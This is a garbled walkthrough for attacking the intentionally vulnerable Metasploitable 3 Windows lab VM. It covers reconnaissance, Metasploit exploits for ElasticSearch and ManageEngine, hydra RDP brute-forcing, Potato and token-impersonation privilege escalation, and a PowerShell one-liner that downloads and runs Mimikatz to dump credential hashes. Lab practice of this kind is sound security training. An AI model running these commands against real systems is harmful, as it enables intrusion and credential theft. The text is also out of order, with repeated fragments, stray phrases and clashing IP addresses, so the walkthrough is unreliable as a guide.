If you are in a native shell (Evil-WinRM or cmd):
# Download Mimikatz
iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -DumpCreds
Expected Output: NTLM hashes for Administrator, vagrant, and the machine account. You can now pass-the-hash to any other machine on the fake network.
Now we figure out what is running.
nmap -sV -sC -O -p 80,445,3389,4848,8172,9200 192.168.56.102
Key Insight for Walkthrough: The presence of WinRM (port 47001) and SMB signing disabled will be our eventual keys to the kingdom.
run post/windows/manage/enable_rdp
hydra -l vagrant -P /usr/share/wordlists/rockyou.txt rdp://192.168.1.100
Check SeImpersonatePrivilege etc.
Use Metasploit getsystem – but may fail. Try Potato exploits:
msf6 > use exploit/windows/local/ms16_075_reflection_juicy
Or manually upload and run JuicyPotato.exe.
whoami /priv
systeminfo | findstr /B /C:"OS Name" /C:"Hotfix"
Metasploitable 3 is missing hundreds of patches. Use Windows-Exploit-Suggester: metasploitable 3 windows walkthrough
python windows-exploit-suggester.py --update
python windows-exploit-suggester.py -d 2024-xx-xx-msf.xls -i systeminfo.txt
Metasploitable 3 Windows Walkthrough: A Comprehensive Guide If you are diving into the world of penetration testing, Metasploitable 3 is your ultimate playground. Unlike its predecessor, which was a Linux-only VM, Metasploitable 3 offers a Windows version (typically based on Windows Server 2008 R2) that is intentionally riddled with vulnerabilities.
This walkthrough covers the setup and several key exploitation paths to help you sharpen your Red Team skills. 1. Lab Setup
Before hacking, you need to build the environment. Metasploitable 3 is unique because it is built automatically using Vagrant and Packer.
Install Prerequisites: You’ll need VirtualBox, Vagrant, and the vagrant-vbguest plugin. Build the VM:
mkdir metasploitable3 && cd metasploitable3 vagrant init rapid7/metasploitable3-win2k8 vagrant up Use code with caution.
Networking: Ensure your attacking machine (Kali Linux) is on the same host-only network as the Metasploitable 3 instance. 2. Information Gathering
The first step in any engagement is reconnaissance. Let’s identify the open ports and services. Nmap Scan: nmap -sV -sC -O 192.168.x.x Use code with caution. You will notice a massive attack surface, including: Port 80/443: IIS 7.5 Port 445: SMB Port 1433: MSSQL Port 3306: MySQL Port 9200: Elasticsearch
3. Exploitation Path A: ElasticSearch (Remote Code Execution)
ElasticSearch on Metasploitable 3 is often an older version vulnerable to CVE-2014-3120. This allows for dynamic script execution. If you are in a native shell (Evil-WinRM
Search for the exploit: In Metasploit, use search elasticsearch. Configure:
use exploit/multi/elasticsearch/script_static_iv_clobber set RHOSTS [Target IP] set LHOST [Your IP] exploit Use code with caution.
Result: You should receive a Meterpreter session running as the user under which ElasticSearch is installed. 4. Exploitation Path B: ManageEngine Desktop Central
Metasploitable 3 hosts an instance of ManageEngine that is vulnerable to a file upload vulnerability (CVE-2015-8249).
Search: use exploit/windows/http/manageengine_connectionid_write. Execute: Set your RHOSTS and RPORT (usually 8020).
Result: This often grants SYSTEM level access immediately, as the service runs with high privileges. 5. Exploitation Path C: Weak Credentials (SMB/MSSQL)
Metasploitable 3 simulates real-world "bad habits," like using default or weak passwords.
SMB: You can use auxiliary/scanner/smb/smb_login with common wordlists.
MSSQL: The sa account often has a weak password. Use exploit/windows/mssql/mssql_payload once you have credentials to gain a shell. 6. Post-Exploitation & Privilege Escalation Expected Output: NTLM hashes for Administrator , vagrant
Once you have a foothold (a standard user shell), your goal is to become NT AUTHORITY\SYSTEM. Local Exploit Suggester:
use post/multi/recon/local_exploit_suggester set SESSION 1 run Use code with caution.
Token Impersonation: If you are an admin but not SYSTEM, use the incognito module in Meterpreter:
use incognito list_tokens -u impersonate_token "NT AUTHORITY\SYSTEM" Use code with caution. 7. The Flags
Metasploitable 3 is designed as a Capture The Flag (CTF) environment. Look for custom icons or text files scattered throughout the system (e.g., on the Administrator's desktop or in the root directory). Each flag represents a successfully compromised service.
Metasploitable 3 Windows serves as a valuable tool for understanding how common misconfigurations and legacy software vulnerabilities can affect a Windows environment. Exploring these pathways provides insight into the importance of regular patching, secure configuration management, and the principle of least privilege.
By identifying these weaknesses in a controlled laboratory setting, security professionals can better develop defensive strategies, improve incident response procedures, and strengthen the overall security posture of production systems.
Here’s a structured walkthrough for Metasploitable 3 (Windows target).
This assumes you have the VM set up (built via Packer/Vagrant) and running on a host-only network with Kali Linux as the attacker machine.